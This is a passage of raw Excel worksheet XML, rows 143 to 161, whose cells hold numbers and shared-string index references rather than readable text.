        <v>552</v>
      </c>
      <c r="X142" s="12">
        <v>23</v>
      </c>
      <c r="Y142" s="12" t="s">
        <v>1350</v>
      </c>
    </row>
    <row r="143" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A143" s="12">
        <v>513</v>
      </c>
      <c r="B143" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D143" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F143" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G143" s="12" t="s">
        <v>1355</v>
      </c>
      <c r="H143" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I143" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J143" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K143" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L143" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M143" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N143" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O143" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P143" s="12" t="s">
        <v>738</v>
      </c>
      <c r="Q143" s="12">
        <v>2.5</v>
      </c>
      <c r="R143" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S143" s="12" t="s">
        <v>1356</v>
      </c>
      <c r="T143" s="12" t="s">
        <v>1357</v>
      </c>
      <c r="U143" s="12" t="s">
        <v>1358</v>
      </c>
      <c r="V143" s="12" t="s">
        <v>1068</v>
      </c>
      <c r="W143" s="12">
        <v>560</v>
      </c>
      <c r="X143" s="12">
        <v>4</v>
      </c>
      <c r="Y143" s="12" t="s">
        <v>1359</v>
      </c>
    </row>
    <row r="144" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A144" s="12">
        <v>514</v>
      </c>
      <c r="B144" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C144" s="12" t="s">
        <v>28449</v>
      </c>
      <c r="D144" s="12" t="s">
        <v>28429</v>
      </c>
      <c r="F144" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G144" s="12" t="s">
        <v>1360</v>
      </c>
      <c r="H144" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I144" s="12" t="s">
        <v>27</v>
      </c>
      <c r="J144" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K144" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L144" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M144" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N144" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O144" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P144" s="12" t="s">
        <v>738</v>
      </c>
      <c r="Q144" s="12">
        <v>2.5</v>
      </c>
      <c r="R144" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S144" s="12" t="s">
        <v>1361</v>
      </c>
      <c r="T144" s="12" t="s">
        <v>1274</v>
      </c>
      <c r="U144" s="12" t="s">
        <v>1362</v>
      </c>
      <c r="V144" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W144" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X144" s="12">
        <v>7</v>
      </c>
      <c r="Y144" s="12" t="s">
        <v>1363</v>
      </c>
    </row>
    <row r="145" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A145" s="12">
        <v>516</v>
      </c>
      <c r="B145" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C145" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D145" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F145" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G145" s="12" t="s">
        <v>1364</v>
      </c>
      <c r="H145" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I145" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J145" s="12" t="s">
        <v>363</v>
      </c>
      <c r="K145" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L145" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M145" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N145" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O145" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P145" s="12" t="s">
        <v>738</v>
      </c>
      <c r="Q145" s="12">
        <v>2.5</v>
      </c>
      <c r="R145" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S145" s="12" t="s">
        <v>1365</v>
      </c>
      <c r="T145" s="12" t="s">
        <v>84</v>
      </c>
      <c r="U145" s="12" t="s">
        <v>1366</v>
      </c>
      <c r="V145" s="12" t="s">
        <v>1367</v>
      </c>
      <c r="W145" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X145" s="12">
        <v>1</v>
      </c>
      <c r="Y145" s="12" t="s">
        <v>1368</v>
      </c>
    </row>
    <row r="146" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A146" s="12">
        <v>519</v>
      </c>
      <c r="B146" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C146" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D146" s="12" t="s">
        <v>28463</v>
      </c>
      <c r="F146" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G146" s="12" t="s">
        <v>1374</v>
      </c>
      <c r="H146" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I146" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J146" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K146" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L146" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M146" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N146" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O146" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P146" s="12" t="s">
        <v>738</v>
      </c>
      <c r="Q146" s="12">
        <v>2.5</v>
      </c>
      <c r="R146" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S146" s="12" t="s">
        <v>1375</v>
      </c>
      <c r="T146" s="12" t="s">
        <v>482</v>
      </c>
      <c r="U146" s="12" t="s">
        <v>1376</v>
      </c>
      <c r="V146" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W146" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X146" s="12">
        <v>3</v>
      </c>
      <c r="Y146" s="12" t="s">
        <v>1377</v>
      </c>
    </row>
    <row r="147" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A147" s="12">
        <v>520</v>
      </c>
      <c r="B147" s="12" t="s">
        <v>28418</v>
      </c>
      <c r="D147" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F147" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G147" s="12" t="s">
        <v>1378</v>
      </c>
      <c r="H147" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I147" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J147" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K147" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L147" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M147" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N147" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O147" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P147" s="12" t="s">
        <v>654</v>
      </c>
      <c r="Q147" s="12">
        <v>2.5</v>
      </c>
      <c r="R147" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S147" s="12" t="s">
        <v>1379</v>
      </c>
      <c r="T147" s="12" t="s">
        <v>260</v>
      </c>
      <c r="U147" s="12" t="s">
        <v>1380</v>
      </c>
      <c r="V147" s="12" t="s">
        <v>323</v>
      </c>
      <c r="W147" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X147" s="12">
        <v>2</v>
      </c>
      <c r="Y147" s="12" t="s">
        <v>1381</v>
      </c>
    </row>
    <row r="148" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A148" s="12">
        <v>524</v>
      </c>
      <c r="B148" s="12" t="s">
        <v>28464</v>
      </c>
      <c r="D148" s="12" t="s">
        <v>28465</v>
      </c>
      <c r="F148" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G148" s="12" t="s">
        <v>1382</v>
      </c>
      <c r="H148" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I148" s="12" t="s">
        <v>145</v>
      </c>
      <c r="J148" s="12" t="s">
        <v>941</v>
      </c>
      <c r="K148" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L148" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M148" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N148" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O148" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P148" s="12" t="s">
        <v>1383</v>
      </c>
      <c r="Q148" s="12">
        <v>2.5</v>
      </c>
      <c r="R148" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S148" s="12" t="s">
        <v>1384</v>
      </c>
      <c r="T148" s="12" t="s">
        <v>1385</v>
      </c>
      <c r="U148" s="12" t="s">
        <v>1386</v>
      </c>
      <c r="V148" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W148" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X148" s="12">
        <v>4</v>
      </c>
      <c r="Y148" s="12" t="s">
        <v>1387</v>
      </c>
    </row>
    <row r="149" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A149" s="12">
        <v>529</v>
      </c>
      <c r="B149" s="12" t="s">
        <v>28426</v>
      </c>
      <c r="C149" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D149" s="12" t="s">
        <v>28425</v>
      </c>
      <c r="E149" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F149" s="12" t="s">
        <v>29728</v>
      </c>
      <c r="G149" s="12" t="s">
        <v>1389</v>
      </c>
      <c r="H149" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I149" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J149" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K149" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L149" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M149" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N149" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O149" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P149" s="12" t="s">
        <v>1390</v>
      </c>
      <c r="Q149" s="12">
        <v>2.5</v>
      </c>
      <c r="R149" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S149" s="12" t="s">
        <v>1391</v>
      </c>
      <c r="T149" s="12" t="s">
        <v>1392</v>
      </c>
      <c r="U149" s="12" t="s">
        <v>1393</v>
      </c>
      <c r="V149" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W149" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X149" s="12">
        <v>20</v>
      </c>
      <c r="Y149" s="12" t="s">
        <v>1394</v>
      </c>
    </row>
    <row r="150" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A150" s="12">
        <v>543</v>
      </c>
      <c r="B150" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C150" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D150" s="12" t="s">
        <v>28429</v>
      </c>
      <c r="F150" s="12" t="s">
        <v>29728</v>
      </c>
      <c r="G150" s="12" t="s">
        <v>1401</v>
      </c>
      <c r="H150" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I150" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J150" s="12" t="s">
        <v>162</v>
      </c>
      <c r="K150" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L150" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M150" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N150" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O150" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P150" s="12" t="s">
        <v>738</v>
      </c>
      <c r="Q150" s="12">
        <v>2.5</v>
      </c>
      <c r="R150" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S150" s="12" t="s">
        <v>1402</v>
      </c>
      <c r="T150" s="12" t="s">
        <v>1403</v>
      </c>
      <c r="U150" s="12" t="s">
        <v>1404</v>
      </c>
      <c r="V150" s="12" t="s">
        <v>608</v>
      </c>
      <c r="W150" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X150" s="12">
        <v>9</v>
      </c>
      <c r="Y150" s="12" t="s">
        <v>1405</v>
      </c>
    </row>
    <row r="151" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A151" s="12">
        <v>544</v>
      </c>
      <c r="B151" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C151" s="12" t="s">
        <v>28424</v>
      </c>
      <c r="D151" s="12" t="s">
        <v>28467</v>
      </c>
      <c r="F151" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G151" s="12" t="s">
        <v>1406</v>
      </c>
      <c r="H151" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I151" s="12" t="s">
        <v>925</v>
      </c>
      <c r="J151" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K151" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L151" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M151" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N151" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O151" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P151" s="12" t="s">
        <v>738</v>
      </c>
      <c r="Q151" s="12">
        <v>2.5</v>
      </c>
      <c r="R151" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S151" s="12" t="s">
        <v>1407</v>
      </c>
      <c r="T151" s="12" t="s">
        <v>1408</v>
      </c>
      <c r="U151" s="12" t="s">
        <v>1409</v>
      </c>
      <c r="V151" s="12" t="s">
        <v>1068</v>
      </c>
      <c r="W151" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X151" s="12">
        <v>3</v>
      </c>
      <c r="Y151" s="12" t="s">
        <v>1410</v>
      </c>
    </row>
    <row r="152" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A152" s="12">
        <v>547</v>
      </c>
      <c r="B152" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C152" s="12" t="s">
        <v>28452</v>
      </c>
      <c r="D152" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F152" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G152" s="12" t="s">
        <v>1411</v>
      </c>
      <c r="H152" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I152" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J152" s="12" t="s">
        <v>23</v>
      </c>
      <c r="K152" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L152" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M152" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N152" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O152" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P152" s="12" t="s">
        <v>738</v>
      </c>
      <c r="Q152" s="12">
        <v>2.5</v>
      </c>
      <c r="R152" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S152" s="12" t="s">
        <v>1412</v>
      </c>
      <c r="T152" s="12" t="s">
        <v>1149</v>
      </c>
      <c r="U152" s="12" t="s">
        <v>1413</v>
      </c>
      <c r="V152" s="12" t="s">
        <v>1149</v>
      </c>
      <c r="W152" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X152" s="12">
        <v>28</v>
      </c>
      <c r="Y152" s="12" t="s">
        <v>1414</v>
      </c>
    </row>
    <row r="153" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A153" s="12">
        <v>548</v>
      </c>
      <c r="B153" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D153" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F153" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G153" s="12" t="s">
        <v>1415</v>
      </c>
      <c r="H153" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I153" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J153" s="12" t="s">
        <v>181</v>
      </c>
      <c r="K153" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L153" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M153" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N153" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O153" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P153" s="12" t="s">
        <v>1396</v>
      </c>
      <c r="Q153" s="12">
        <v>2.4</v>
      </c>
      <c r="R153" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S153" s="12" t="s">
        <v>1416</v>
      </c>
      <c r="T153" s="12" t="s">
        <v>1417</v>
      </c>
      <c r="U153" s="12" t="s">
        <v>1418</v>
      </c>
      <c r="V153" s="12" t="s">
        <v>202</v>
      </c>
      <c r="W153" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X153" s="12">
        <v>3</v>
      </c>
      <c r="Y153" s="12" t="s">
        <v>1419</v>
      </c>
    </row>
    <row r="154" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A154" s="12">
        <v>549</v>
      </c>
      <c r="B154" s="12" t="s">
        <v>28468</v>
      </c>
      <c r="D154" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F154" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G154" s="12" t="s">
        <v>1420</v>
      </c>
      <c r="H154" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I154" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J154" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K154" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L154" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M154" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N154" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O154" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P154" s="12" t="s">
        <v>1421</v>
      </c>
      <c r="Q154" s="12">
        <v>2.5</v>
      </c>
      <c r="R154" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S154" s="12" t="s">
        <v>1422</v>
      </c>
      <c r="T154" s="12" t="s">
        <v>1423</v>
      </c>
      <c r="U154" s="12" t="s">
        <v>1424</v>
      </c>
      <c r="V154" s="12" t="s">
        <v>114</v>
      </c>
      <c r="W154" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X154" s="12">
        <v>2</v>
      </c>
      <c r="Y154" s="12" t="s">
        <v>1425</v>
      </c>
    </row>
    <row r="155" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A155" s="12">
        <v>555</v>
      </c>
      <c r="B155" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D155" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F155" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G155" s="12" t="s">
        <v>1426</v>
      </c>
      <c r="H155" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I155" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J155" s="12" t="s">
        <v>103</v>
      </c>
      <c r="K155" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L155" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M155" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N155" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O155" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P155" s="12" t="s">
        <v>1421</v>
      </c>
      <c r="Q155" s="12">
        <v>2.5</v>
      </c>
      <c r="R155" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S155" s="12" t="s">
        <v>1427</v>
      </c>
      <c r="T155" s="12" t="s">
        <v>1428</v>
      </c>
      <c r="U155" s="12" t="s">
        <v>1429</v>
      </c>
      <c r="V155" s="12" t="s">
        <v>179</v>
      </c>
      <c r="W155" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X155" s="12">
        <v>2</v>
      </c>
      <c r="Y155" s="12" t="s">
        <v>1430</v>
      </c>
    </row>
    <row r="156" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A156" s="12">
        <v>582</v>
      </c>
      <c r="B156" s="12" t="s">
        <v>28469</v>
      </c>
      <c r="C156" s="12" t="s">
        <v>28424</v>
      </c>
      <c r="D156" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F156" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G156" s="12" t="s">
        <v>1483</v>
      </c>
      <c r="H156" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I156" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J156" s="12" t="s">
        <v>1461</v>
      </c>
      <c r="K156" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L156" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M156" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N156" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O156" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P156" s="12" t="s">
        <v>738</v>
      </c>
      <c r="Q156" s="12">
        <v>2.5</v>
      </c>
      <c r="R156" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S156" s="12" t="s">
        <v>1484</v>
      </c>
      <c r="T156" s="12" t="s">
        <v>1485</v>
      </c>
      <c r="U156" s="12" t="s">
        <v>1486</v>
      </c>
      <c r="V156" s="12" t="s">
        <v>1487</v>
      </c>
      <c r="W156" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X156" s="12">
        <v>0</v>
      </c>
      <c r="Y156" s="12" t="s">
        <v>1488</v>
      </c>
    </row>
    <row r="157" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A157" s="12">
        <v>583</v>
      </c>
      <c r="B157" s="12" t="s">
        <v>28470</v>
      </c>
      <c r="D157" s="12" t="s">
        <v>28471</v>
      </c>
      <c r="E157" s="12" t="s">
        <v>31449</v>
      </c>
      <c r="F157" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G157" s="12" t="s">
        <v>1489</v>
      </c>
      <c r="H157" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I157" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J157" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K157" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L157" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M157" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N157" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O157" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P157" s="12" t="s">
        <v>1421</v>
      </c>
      <c r="Q157" s="12">
        <v>2.5</v>
      </c>
      <c r="R157" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S157" s="12" t="s">
        <v>1490</v>
      </c>
      <c r="T157" s="12" t="s">
        <v>1491</v>
      </c>
      <c r="U157" s="12" t="s">
        <v>1492</v>
      </c>
      <c r="V157" s="12" t="s">
        <v>1493</v>
      </c>
      <c r="W157" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X157" s="12">
        <v>2</v>
      </c>
      <c r="Y157" s="12" t="s">
        <v>1494</v>
      </c>
    </row>
    <row r="158" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A158" s="12">
        <v>584</v>
      </c>
      <c r="B158" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C158" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D158" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F158" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G158" s="12" t="s">
        <v>1495</v>
      </c>
      <c r="H158" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I158" s="12" t="s">
        <v>525</v>
      </c>
      <c r="J158" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K158" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L158" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M158" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N158" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O158" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P158" s="12" t="s">
        <v>1421</v>
      </c>
      <c r="Q158" s="12">
        <v>2.5</v>
      </c>
      <c r="R158" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S158" s="12" t="s">
        <v>1496</v>
      </c>
      <c r="T158" s="12" t="s">
        <v>1481</v>
      </c>
      <c r="U158" s="12" t="s">
        <v>917</v>
      </c>
      <c r="V158" s="12" t="s">
        <v>130</v>
      </c>
      <c r="W158" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X158" s="12">
        <v>6</v>
      </c>
      <c r="Y158" s="12" t="s">
        <v>1497</v>
      </c>
    </row>
    <row r="159" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A159" s="12">
        <v>586</v>
      </c>
      <c r="B159" s="12" t="s">
        <v>28472</v>
      </c>
      <c r="C159" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D159" s="12" t="s">
        <v>28473</v>
      </c>
      <c r="E159" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F159" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G159" s="12" t="s">
        <v>1498</v>
      </c>
      <c r="H159" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I159" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J159" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K159" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L159" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M159" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N159" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O159" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P159" s="12" t="s">
        <v>1421</v>
      </c>
      <c r="Q159" s="12">
        <v>2.5</v>
      </c>
      <c r="R159" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S159" s="12" t="s">
        <v>1499</v>
      </c>
      <c r="T159" s="12" t="s">
        <v>719</v>
      </c>
      <c r="U159" s="12" t="s">
        <v>1500</v>
      </c>
      <c r="V159" s="12" t="s">
        <v>202</v>
      </c>
      <c r="W159" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X159" s="12">
        <v>10</v>
      </c>
      <c r="Y159" s="12" t="s">
        <v>1501</v>
      </c>
    </row>
    <row r="160" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A160" s="12">
        <v>588</v>
      </c>
      <c r="B160" s="12" t="s">
        <v>28474</v>
      </c>
      <c r="D160" s="12" t="s">
        <v>28475</v>
      </c>
      <c r="E160" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F160" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G160" s="12" t="s">
        <v>1502</v>
      </c>
      <c r="H160" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I160" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J160" s="12" t="s">
        <v>14</v>
      </c>
      <c r="K160" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L160" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M160" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N160" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O160" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P160" s="12" t="s">
        <v>1421</v>
      </c>
      <c r="Q160" s="12">
        <v>2.5</v>
      </c>
      <c r="R160" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S160" s="12" t="s">
        <v>1503</v>
      </c>
      <c r="T160" s="12" t="s">
        <v>1504</v>
      </c>
      <c r="U160" s="12" t="s">
        <v>1505</v>
      </c>
      <c r="V160" s="12" t="s">
        <v>518</v>
      </c>
      <c r="W160" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X160" s="12">
        <v>8</v>
      </c>
      <c r="Y160" s="12" t="s">
        <v>1506</v>
      </c>
    </row>
    <row r="161" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A161" s="12">
        <v>590</v>
      </c>
      <c r="B161" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D161" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F161" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G161" s="12" t="s">
        <v>1507</v>
      </c>
      <c r="H161" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I161" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J161" s="12" t="s">
        <v>36</v>
      </c>
      <c r="K161" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L161" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M161" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N161" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O161" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P161" s="12" t="s">
        <v>1421</v>
      </c>
      <c r="Q161" s="12">
        <v>2.5</v>
      </c>
      <c r="R161" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S161" s="12" t="s">
        <v>1508</v>
      </c>
      <c r="T161" s="12" t="s">
        <v>992</v>
      </c>
      <c r="U161" s="12" t="s">
        <v>1509</v>
      </c>
      <c r="V161" s="12" t="s">
        <v>608</v>
      </c>
      <c r="W161" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X161" s="12">
        <v>5</v>
      </c>
